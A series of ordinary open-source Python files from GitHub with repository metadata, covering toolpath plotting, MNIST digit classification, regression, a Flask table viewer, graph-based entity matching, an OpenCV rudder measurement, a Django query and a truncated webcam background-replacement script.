radius = sgn*data['radius']
step_z = data['step_z']
plot_circle(radius, step_z+0.5*diam_tool, 0.5*diam_tool,color='g')
plt.plot([radius], [step_z+0.5*diam_tool], '.g')
plt.plot([radius], [step_z], 'xr')
#plt.plot([radius, 0.0], [step_z+0.5*diam_tool,params['center_z']], 'r')
# Plot material boundaries
dx = 2*params['diam_sphere']
dy = 2*params['center_z']
plt.plot([-dx, dx], [0, 0],'k')
plt.plot([-dx, dx], [dy, dy], 'k')
# -----------------------------------------------------------------------------
if __name__ == '__main__':
params = {
'diam_sphere' : mm_to_inch(12.0),
'diam_tool' : 1.0/8.0 ,
'margin' : 0.0,
'step_size' : 0.01,
'tab_thickness' : 0.02,
'center_z' : -0.75/2.0,
}
fig_num = 1
plt.figure(fig_num)
plot_spheremill_toolpos(params)
plt.axis('equal')
plt.grid('on')
plt.show()
|
willdickson/sphere_mill_gcode
|
sphere_mill_gcode/ball_endmill_viz.py
|
ball_endmill_viz.py
|
py
| 2,135 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "utility.plot_circle",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "utility.plot_circle",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "ball_endmill.get_toolpath_annulus_data",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "utility.plot_circle",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 43,
"usage_type": "name"
},
{
"api_name": "utility.mm_to_inch",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.axis",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 62,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.grid",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 64,
"usage_type": "name"
}
] |
10933119158
|
import os
import cv2 # computer vision
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
mnist = tf.keras.datasets.mnist # The handwritten digit images and their labels
(x_train, y_train), (x_test, y_test) = mnist.load_data() # split into training data and test data || x is the pixel data, y is the digit label
x_train = tf.keras.utils.normalize(x_train, axis=1) # scale all values to 0-1 instead of 0-255
x_test = tf.keras.utils.normalize(x_test, axis=1)
model = tf.keras.models.Sequential()
model.add(tf.keras.layers.Flatten(input_shape=(28, 28))) # flattens the 28x28 grid of pixels into one line of 784 values
model.add(tf.keras.layers.Dense(236, activation='relu')) # rectified linear unit
model.add(tf.keras.layers.Dense(10, activation="softmax")) # output layer || softmax = pick the most confident neuron
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.fit(x_train, y_train, epochs=3) # Train model || epoch = how many times the network sees the same data
model.save('HandWriteModel.model')
#model = tf.keras.models.load_model('HandWriteModel')
image_number = 1
while os.path.isfile(f"DigetsByMe\\diget{image_number}.png"):
try:
        img = cv2.imread(f"DigetsByMe\\diget{image_number}.png")[:,:,0] # keep only one colour channel of the BGR image
img = np.invert(np.array([img]))
prediction = model.predict(img)
print(f"The number is {np.argmax(prediction)}")
plt.imshow(img[0], cmap=plt.cm.binary)
plt.show()
except:
        print("Image is probably not 28 by 28")
finally:
image_number += 1
loss, accuracy = model.evaluate(x_test, y_test)
print(loss)
print(accuracy)
|
Zippy-boy/HandDigets
|
main.py
|
main.py
|
py
| 1,658 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "tensorflow.keras",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.utils.normalize",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.utils.normalize",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.models.Sequential",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.layers.Flatten",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.layers.Dense",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.layers.Dense",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.isfile",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "cv2.imread",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.invert",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.argmax",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.imshow",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.cm",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 37,
"usage_type": "name"
}
] |
38466019670
|
__author__ = 'christiaanleysen'
import features.featureMaker as fm
from sklearn.metrics import mean_absolute_error
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn import preprocessing
'''
This file is used to calculate the linear regression
'''
def predictConsumption(trainSetX, trainSetY, testSetX, testSetY,tune_params=True,scaled=False):
"""
predicts the consumption
Parameters:
-----------
trainSetX: training feature set
trainSetY: training value set
testSetX: test feature set
testSetY: test value set
Returns:
--------
a prediction of the consumption
"""
if scaled:
trainSetX = np.asarray([preprocessing.scale(element)for element in trainSetX])
#trainSetY =preprocessing.scale(trainSetY,axis=0)
testSetX = np.asarray([preprocessing.scale(element )for element in testSetX])
#testSetY =preprocessing.scale(testSetY,axis=0)
OLS = LinearRegression()
OLS.fit(trainSetX,trainSetY)# fit default model (mean zero & rbf kernel) with data
predictedSetY = OLS.predict(testSetX)
MAE = mean_absolute_error(testSetY,predictedSetY)
if np.mean(np.mean(testSetY)) == 0:
MRE = 50
else:
MRE = (MAE/(np.mean(testSetY)))*100
return predictedSetY,testSetY,MAE,MRE
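# --- Hedged usage sketch (not part of the original module) ---
# Illustrates the expected call signature on synthetic data; the shapes and
# target weights below are assumptions made purely for illustration.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    X_train, X_test = rng.rand(50, 4), rng.rand(10, 4)
    weights = np.array([1.0, 2.0, 0.5, -1.0])
    y_train, y_test = X_train.dot(weights), X_test.dot(weights)
    pred, truth, mae, mre = predictConsumption(X_train, y_train, X_test, y_test)
    print(mae, mre)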
|
chrike-platinum/Thesis-Gaussian-process-regression-clustering-and-prediction-of-energy-consumption
|
Methods/LinRegPrediction.py
|
LinRegPrediction.py
|
py
| 1,353 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "numpy.asarray",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing.scale",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "numpy.asarray",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing.scale",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "sklearn.linear_model.LinearRegression",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.mean_absolute_error",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 44,
"usage_type": "call"
}
] |
27267969236
|
from flask import Flask, render_template
from shp_display import *
app = Flask(__name__)
def script():
return ['hades2']
def get_table(db):
db = db
script = "<table>"
# Header Generator
code = "<tr>"
for s in db:
if str(s) != "MULTIPOLYGON" and str(s) != 'geometry':
code = code + "<th>" + str(s) + "</th>"
    script = script + code + "</tr>"
# Data Generator
for i in range(len(db.index)):
code = "<tr>"
for item in list(db.loc[i]):
if not str(item).startswith("MULTIPOLYGON") and not str(item).startswith("POLYGON "):
code = code + "<td>" + str(item) + "</td>"
code = code + "</tr>"
script = script + code
script = script + "</table>"
return script
@app.route('/')
def index():
value = script()
return render_template('index.html',
entry1=value[0],
path_to_image=some[0],
lis=some[1].shape,
table_n=get_table(some[1])
)
@app.route('/up_pop')
def up_pop():
some = get_file()
return render_template('up_population.html',
table_n=get_table(some[1]),
path_to_image=some[0])
if __name__ == "__main__":
app.run(debug=True, host='10.68.69.29')
|
nitish8090/Watershed_Modules_Py3
|
flask_app/app.py
|
app.py
|
py
| 1,373 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 49,
"usage_type": "call"
}
] |
74099804029
|
import os
import os.path as osp
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pandas as pd
import argparse
from dataset import collate_fn, MergedMatchingDataset
from torch.utils.data import DataLoader
from EmbedModel import EmbedModel
from GCN import gcn
from logger import set_logger
from utils import _read_csv, accuracy
def fetch_edge(batch):
edges = []
types = []
for ex in batch:
type = ex["type"]
center_id = ex["center"][0]
neighbors = []
if "neighbors_mask" in ex:
for i, n in enumerate(ex["neighbors"]):
if ex["neighbors_mask"][i] == 0:
continue
neighbors.append(n)
else:
neighbors = ex["neighbors"]
if type == 'l':
edges += [[center_id, n[0]] for n in neighbors]
types += [0] * len(neighbors)
elif type == 'r':
edges += [[n[0], center_id] for n in neighbors]
types += [1] * len(neighbors)
else:
raise NotImplementedError
return edges, types
def calculate_f1(edges, scores, labels, types, score_type='left'):
score_dict={}
for i, edge in enumerate(edges):
score = scores[i]
label = labels[i]
e = tuple(edge)
if e in score_dict:
assert score_dict[e][1] == label
if score_type == 'max':
score_dict[e] = (max(score_dict[e][0],score),label)
elif score_type == 'mean':
score_dict[e] = ((score_dict[e][0] + score) / 2.0, label)
elif score_type == 'min':
score_dict[e] = (min(score_dict[e][0], score), label)
else:
raise NotImplementedError
else:
score_dict[e] = (score,label)
score_label = score_dict.values()
scores = np.asarray([i[0] for i in score_label])
label = np.asarray([i[1] for i in score_label])
pred = (scores > 0.5).astype('int')
TP = np.sum((pred == 1) * (label == 1))
TN = np.sum((pred == 0) * (label == 0))
FP = np.sum((pred == 1) * (label == 0))
FN = np.sum((pred == 0) * (label == 1))
acc = (TP + TN) * 1.0 / (TP + TN + FN + FP)
if TP == 0:
        p = r = f1 = 0.0
else:
p = TP * 1.0 / (TP + FP)
r = TP * 1.0 / (TP + FN)
f1 = 2 * p * r / (p + r)
return p, r, f1, acc, score_dict
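# Hedged worked example (not part of the original script): calculate_f1 merges the
# scores of duplicate edges, so with score_type='mean' the two scores for the
# repeated edge (0, 1) are averaged to 0.7 before thresholding at 0.5. All values
# below are made up purely for illustration.
def _calculate_f1_example():
    edges = [[0, 1], [0, 1], [2, 3]]
    scores = [0.8, 0.6, 0.2]
    labels = [1, 1, 0]
    types = [0, 1, 0]
    return calculate_f1(edges, scores, labels, types, score_type='mean')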
def test(iter,logger,model,embed_model,crit,test_step=None,tf_logger=None,score_type='mean', prefix='Test'):
model.eval()
embed_model.eval()
edges = []
scores = []
labels = []
types = []
for j, batch in enumerate(iter):
with torch.no_grad():
edge,type = fetch_edge(batch)
feature, A, label, masks = embed_model(batch)
masks = masks.view(-1)
label = label.view(-1)[masks == 1].long()
pred = model(feature, A)
pred = pred[masks == 1]
loss = crit(pred, label)
pred = F.softmax(pred, dim=1)
p, r, acc = accuracy(pred, label)
logger.info(
'{}\t[{:d}/{:d}]\tLoss {:.3f}\tAccuracy {:.3f}\tPrecison {:.3f}\tRecall {:.3f}'.format(prefix,j+1,len(iter),loss,acc,
p, r))
assert pred.shape[0] == label.shape[0]
scores += pred[:,1].detach().cpu().numpy().tolist()
edges += edge
labels += label.detach().cpu().numpy().tolist()
types += type
edges = np.asarray(edges)
scores = np.asarray(scores)
labels = np.asarray(labels)
types = np.asarray(types)
if not isinstance(score_type,list):
score_type = [score_type]
f1s = []
for t in score_type:
p, r, f1, acc, score_dict = calculate_f1(edges, scores, labels, types, score_type=t.lower())
f1s.append(f1)
logger.info('{}\t{}\tPrecison {:.3f}\tRecall {:.3f}\tF1-score {:.3f}\tAccuracy {:.3f}'.format(prefix, t, p, r, f1, acc))
if tf_logger:
tf_logger.add_scalar('{}/{}/Precision'.format(prefix, t), p, test_step)
tf_logger.add_scalar('{}/{}/Recall'.format(prefix, t), r, test_step)
tf_logger.add_scalar('{}/{}/f1Score'.format(prefix, t), f1, test_step)
tf_logger.add_scalar('{}/{}/Accuracy'.format(prefix, t), acc, test_step)
return f1s
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# misc
working_dir = osp.dirname(osp.abspath(__file__))
parser.add_argument('--seed', default=1, type=int)
parser.add_argument('--score_type', type=str, nargs='+')
# Test args
parser.add_argument('--batch_size', type=int, default=8)
parser.add_argument('--tableA_path', type=str)
parser.add_argument('--tableB_path', type=str)
parser.add_argument('--train_path', type=str)
parser.add_argument('--test_path', type=str)
parser.add_argument('--val_path', type=str)
parser.add_argument('--checkpoint_path', type=str)
# Device
parser.add_argument('--gpu', type=int, default=[0], nargs='+')
# Model
parser.add_argument('--gcn_layer', default=1, type=int)
args = parser.parse_args()
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
tableA = _read_csv(args.tableA_path)
tableB = _read_csv(args.tableB_path)
useful_field_num = len(tableA.columns) - 1
gcn_dim = 768
test_dataset = MergedMatchingDataset(args.test_path, tableA, tableB, other_path=[args.train_path, args.val_path])
test_iter = DataLoader(test_dataset, batch_size=args.batch_size, collate_fn=collate_fn, shuffle=False)
embedmodel = EmbedModel(useful_field_num=useful_field_num,device=args.gpu)
model = gcn(dims=[gcn_dim]*(args.gcn_layer + 1))
criterion = nn.CrossEntropyLoss().to(embedmodel.device)
logger = set_logger()
if args.checkpoint_path:
checkpoint = torch.load(args.checkpoint_path)
if len(args.gpu) == 1:
new_state_dict = {k.replace('module.', ''): v for k, v in checkpoint["embed_model"].items()}
embedmodel.load_state_dict(new_state_dict)
else:
embedmodel.load_state_dict(checkpoint["embed_model"])
model.load_state_dict(checkpoint["model"])
test_type = [checkpoint["type"]]
logger.info("Test Type:\t{}".format(checkpoint["type"]))
else:
test_type = args.test_type
embedmodel = embedmodel.to(embedmodel.device)
model = model.to(embedmodel.device)
test(iter=test_iter, logger=logger, model=model, embed_model=embedmodel, crit=criterion, score_type=test_type)
|
ChenRunjin/GNEM
|
test.py
|
test.py
|
py
| 6,754 |
python
|
en
|
code
| 5 |
github-code
|
6
|
[
{
"api_name": "numpy.asarray",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional.softmax",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 98,
"usage_type": "name"
},
{
"api_name": "utils.accuracy",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "logger.info",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 112,
"usage_type": "call"
},
{
"api_name": "logger.info",
"line_number": 120,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 130,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 132,
"usage_type": "name"
},
{
"api_name": "os.path.abspath",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "torch.manual_seed",
"line_number": 153,
"usage_type": "call"
},
{
"api_name": "torch.cuda.manual_seed_all",
"line_number": 154,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 154,
"usage_type": "attribute"
},
{
"api_name": "numpy.random.seed",
"line_number": 155,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 155,
"usage_type": "attribute"
},
{
"api_name": "utils._read_csv",
"line_number": 157,
"usage_type": "call"
},
{
"api_name": "utils._read_csv",
"line_number": 158,
"usage_type": "call"
},
{
"api_name": "dataset.MergedMatchingDataset",
"line_number": 162,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.DataLoader",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "dataset.collate_fn",
"line_number": 165,
"usage_type": "name"
},
{
"api_name": "EmbedModel.EmbedModel",
"line_number": 167,
"usage_type": "call"
},
{
"api_name": "GCN.gcn",
"line_number": 170,
"usage_type": "call"
},
{
"api_name": "torch.nn.CrossEntropyLoss",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 172,
"usage_type": "name"
},
{
"api_name": "logger.set_logger",
"line_number": 174,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "logger.info",
"line_number": 185,
"usage_type": "call"
}
] |
35037176201
|
import cv2
import numpy as np
from analyzers.analyseContour import AnalyseContour
from analyzers.contour import Contour
class AnalyseSafran(AnalyseContour):
    """
    Class that measures the height of the rudder blade (safran) sticking out of the water.
    Attributes:
    x1RefPoint (int): x coordinate of the first reference point, corresponding to the highest point of the rudder.
    y1RefPoint (int): y coordinate of the first reference point, corresponding to the highest point of the rudder.
    x2RefPoint (int): x coordinate of the second reference point, used to compute the line along the rudder.
    y2RefPoint (int): y coordinate of the second reference point, used to compute the line along the rudder.
    """
def __init__(self, x1, y1, x2, y2, x1RefPoint, y1RefPoint, x2RefPoint, y2RefPoint, qualityLimit):
super().__init__(x1, y1, x2, y2, qualityLimit)
self.x1RefPoint = x1RefPoint - x1
self.y1RefPoint = y1RefPoint - y1
self.x2RefPoint = x2RefPoint - x1
self.y2RefPoint = y2RefPoint - y1
    def compute(self, frame):
        """
        Measures the height of the rudder blade (safran) sticking out of the water.
        """
m = (self.y2RefPoint - self.y1RefPoint) / (self.x2RefPoint - self.x1RefPoint)
p = self.y1RefPoint - m * self.x1RefPoint
cropFrame = frame[self.y1:self.y2, self.x1:self.x2]
qualityIndex = self.embrunDetection.detection(cropFrame)
        # Convert to grayscale and blur
gray_img_safran = cv2.cvtColor(cropFrame, cv2.COLOR_BGR2GRAY)
gray_img_safran = cv2.GaussianBlur(gray_img_safran, (3, 7), 0)
        # Draw all the edges
median_pix = np.median(gray_img_safran)
lower = int(max(0, 0.5*median_pix))
upper = int(min(255, 1.3*median_pix))
edged = cv2.Canny(gray_img_safran, lower, upper)
        # Contour detection
        # The hierarchy variable holds information about the relationship between contours (whether one contour is nested inside another)
contours_list_safran, hierarchy = cv2.findContours(edged, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if contours_list_safran:
contourSafran = None
for c in contours_list_safran:
                # If a contour is within 15 pixels of the point (a point on the leading edge of the rudder)
if abs(cv2.pointPolygonTest(c, (self.x1RefPoint + 1, self.y1RefPoint + 3), True)) < 15:
contourSafran = c
tOffSetSafran = (self.x1, self.y1)
points = []
                    # Check whether the points roughly satisfy the rudder's line equation
                    # Equation representing the straight line along the rudder
for point in c:
x = point[0][0]
y = point[0][1]
                        # Result of the equation
resultEquation = m * x - y + p
if resultEquation > -15 and resultEquation < 15:
points.append((x, y))
if len(points) >= 2:
                        # firstPointSafran = min(points, key=lambda x:x[1]) # Smallest y value
firstPointSafran = (self.x1RefPoint, self.y1RefPoint)
                        # Largest y value
secondPointSafran = max(points, key=lambda x: x[1])
                        # Add the offset so the points map back onto the original image
firstPointSafranOffSet = tuple(map(lambda x, y: x + y, firstPointSafran, tOffSetSafran))
secondPointSafranOffSet = tuple(map(lambda x, y: x + y, secondPointSafran, tOffSetSafran))
hauteurSafran = secondPointSafran[1] - firstPointSafran[1]
                        # Offset the contour coordinates so they map back onto the original image (frame)
contourSafranOffset = contourSafran + (self.x1, self.y1)
return Contour(hauteurSafran, contourSafranOffset, firstPointSafranOffSet, secondPointSafranOffSet, qualityIndex)
return Contour(None, None, None, None, qualityIndex)
|
Torystan/analyse-images
|
analyzers/analyseSafran.py
|
analyseSafran.py
|
py
| 4,231 |
python
|
fr
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "analyzers.analyseContour.AnalyseContour",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "cv2.cvtColor",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "cv2.GaussianBlur",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.median",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "cv2.Canny",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "cv2.findContours",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "cv2.RETR_TREE",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "cv2.CHAIN_APPROX_SIMPLE",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "cv2.pointPolygonTest",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "analyzers.contour.Contour",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "analyzers.contour.Contour",
"line_number": 90,
"usage_type": "call"
}
] |
73727669948
|
import torch
def get_device(model=None):
"""Returns two-tuple containing a PyTorch device (CPU or GPU(s)), and number of available GPUs.
Returns a two-tuple containing a PyTorch device (CPU or GPU(s)) and number of available CUDA
devices. If `model` is not None, and a CUDA device is available, the model is placed on the
    CUDA device with `model.to(device)`. If multiple GPUs are available, the model is parallelized
    with `torch.nn.DataParallel(model)`.
    Args:
        model (torch.nn.Module): PyTorch model; if a CUDA device is available this function will place the
        model on the CUDA device with `model.to(device)`. If multiple CUDA devices are available,
        the model is parallelized with `torch.nn.DataParallel(model)`.
Returns:
A two-tuple containing a PyTorch device (CPU or GPU(s)), and number of available GPUs.
"""
n_gpu = 0
# use a GPU if available
if torch.cuda.is_available():
device = torch.device("cuda")
n_gpu = torch.cuda.device_count()
# if model is provided, we place it on the GPU and parallize it (if possible)
if model:
model.to(device)
if n_gpu > 1:
model = torch.nn.DataParallel(model)
model_names = ', '.join([torch.cuda.get_device_name(i) for i in range(n_gpu)])
print('Using CUDA device(s) with name(s): {}.'.format(model_names))
else:
device = torch.device("cpu")
print('No GPU available. Using CPU.')
return device, n_gpu
def preprocess_query(query):
"""Preprocesses `query` to look more like natural language.
    Preprocess `query` to look more like natural language by punctuating it with a question mark and
    rearranging it into a subject-verb-object (SVO) topology.
Args:
query (str): Query from Wiki- or Medhop.
Returns:
`query`, punctuated by a question mark and re-arranged into an SVO topology.
"""
return ' '.join(query.split(' ')[1:] + query.split(' ')[0].split('_')).replace('?', '') + '?'
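# --- Hedged usage sketch (not part of the original module) ---
# The query below is a made-up example in the Wiki-/MedHop style
# ("relation_with_underscores subject") and only illustrates the rearrangement.
if __name__ == '__main__':
    print(preprocess_query('country_of_citizenship marie_curie'))
    # -> 'marie_curie country of citizenship?'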
|
bowang-lab/Transformer-GCN-QA
|
src/utils/model_utils.py
|
model_utils.py
|
py
| 2,040 |
python
|
en
|
code
| 15 |
github-code
|
6
|
[
{
"api_name": "torch.cuda.is_available",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "torch.device",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "torch.cuda.device_count",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.DataParallel",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "torch.cuda.get_device_name",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "torch.device",
"line_number": 34,
"usage_type": "call"
}
] |
73675801466
|
import os, sys
proj_path = "/home/webuser/webapps/tigaserver/"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tigaserver_project.settings")
sys.path.append(proj_path)
os.chdir(proj_path + "util_scripts/")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
from django.db.models import Count
from tigaserver_app.models import EuropeCountry, Report, ExpertReportAnnotation, Categories
current_progress = Report.objects.exclude(creation_time__year=2014).exclude(note__icontains="#345").exclude(hide=True).exclude(photos=None).filter(type='adult').annotate(n_annotations=Count('expert_report_annotations')).filter(n_annotations__lt=3).exclude(n_annotations=0).order_by('-server_upload_time')
reports_filtered = filter(lambda x: not x.deleted and x.latest_version, current_progress)
for c in current_progress:
country = 'None'
if c.country is not None:
country = c.country.name_engl
print("Report in progress {0} - country {1} - date {2}".format(c.version_UUID, country, c.server_upload_time ))
assigned_to = ExpertReportAnnotation.objects.filter(report=c)
for a in assigned_to:
print("\t - assigned to {0} from country , regional manager , country has regional manager ".format( a.user.username ))
|
Mosquito-Alert/mosquito_alert
|
util_scripts/check_in_progress_reports.py
|
check_in_progress_reports.py
|
py
| 1,276 |
python
|
en
|
code
| 6 |
github-code
|
6
|
[
{
"api_name": "os.environ.setdefault",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "os.chdir",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.core.wsgi.get_wsgi_application",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tigaserver_app.models.Report.objects.exclude",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "tigaserver_app.models.Report.objects",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "tigaserver_app.models.Report",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "django.db.models.Count",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "tigaserver_app.models.ExpertReportAnnotation.objects.filter",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "tigaserver_app.models.ExpertReportAnnotation.objects",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "tigaserver_app.models.ExpertReportAnnotation",
"line_number": 25,
"usage_type": "name"
}
] |
1601092211
|
__author__ = "Meet Dave"
__version__ = "1.0"
__maintainer__ = "Meet Dave"
__email__ = "[email protected]"
# Load libraries
import matplotlib.pyplot as plt
import torch
import cv2
import numpy as np
from torchvision import models
from torchvision import transforms
from make_video import make_video
# Load pretrained model
deeplapv3_101 = models.segmentation.deeplabv3_resnet101(pretrained=True).eval()
# Load background image
background_path = "../images/books-seats.png"
background = cv2.imread(background_path)
background = cv2.cvtColor(background, cv2.COLOR_BGR2RGB)
video_path = "../images/test1.avi"
# Webcam stream
cap = cv2.VideoCapture(0)
ret, img = cap.read()
height = img.shape[0]
width = img.shape[1]
video_download = make_video(video_path,width,height)
background = cv2.resize(background, (width,height))
background = background.astype(float)
# Preprocess class
preprocess = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize((256,256)),
transforms.ToTensor(),
